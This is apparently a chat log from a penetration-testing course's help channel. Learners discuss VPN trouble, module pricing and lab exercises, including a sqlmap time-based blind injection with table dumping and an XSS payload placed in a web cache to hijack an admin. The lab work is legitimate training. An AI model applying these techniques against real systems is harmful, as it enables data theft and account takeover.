To quote SuperNuts: Just say the module/section/question you're stuck on, what you tried, any errors, more info, etc. without revealing content from modules above tier 0 and someone may be able to help

#

That doesn't look like a VPN error

cloud urchin
#

I'm not Marcie!!

ocean night
#

Wait

late rune
#

and as far as I can see I use also one VPN

ocean night
#

Sorry SuperNuts

late rune
#

I will try tomorrow and deleted all the old imported vpn files

cloud urchin
#

lol i'm sure Marcie said the same thing at one point

fathom pendant
#

to be fair; we said basically the same thing

ocean night
#

MarcieLee also said: he best way to get help here is to provide the module name, section name, and what you're stuck on. (link to the module is a plus)

fathom pendant
#

and I said it one message later

ocean night
#

yarp

fathom pendant
#

therefore I said it first

late rune
#

For now GN
It is here 22:28 so late for me

cloud urchin
#

@acoustic briar Please take care not to post content from modules above tier 0. Yes, it worked when I did it. Make sure to read the whole section carefully, including the callouts in the Note: section...

acoustic briar
cloud urchin
#

i tried it on /etc/hosts personally, worked for me

acoustic briar
#

ok, indeed with /etc/hosts it works. I will investigate this, thanks!

acoustic briar
#

My best guess is length limitations although that is not really mentioned for this method.

boreal vine
#

anyone has done the skill assessment for Sqlmap ? So far I found the time-based blind in the "id" parameter when trying to add to cart, but it keeps saying that it is unable to retrieve data from the tables when I specify --tables --dump

abstract gull
hidden ledge
north pebble
#

Hello buddies.

#

I encountered a problem during the final skills assessment in the <Abusing HTTP Misconfigurations> module: Nothing changed after I tried to inject the XSS payload into the web cache.

#

And note that the official answer is: "After waiting for a few seconds, students will notice that the admin has triggered the XSS payload". But several minutes have passed, and nothing has changed now( I still don't get the admin permission.

#

So what's happened, buddies? How can we resolve this puzzling problem?

boreal vine
bright quiver
#

I did come across this - you still working on this or ? feel free to DM me - we can work this together if you want

sage granite
#

module price is insane now

cloud urchin
#

agreed the value is insane for the content

sage granite
#

3400 cubes for WiFi pentester path? give me a break, i know most of it without paying a cent

cloud urchin
#

you can have your opinion, i don't really see any other platform beating the value still

#

and you can learn anything without paying a cent

#

i think there's nothing like experience, actually doing it. if you don't pay anything you can't really do it. you at minimum need a few wireless adapters capable of monitor mode and a few wireless networks to attack. the wifi cyberlabs are pretty awesome, it gives you that experience too. it can be a lot more convenient for someone to learn through a course.

acoustic owl
sage granite
cloud urchin
#

i have never seen them change the price of modules...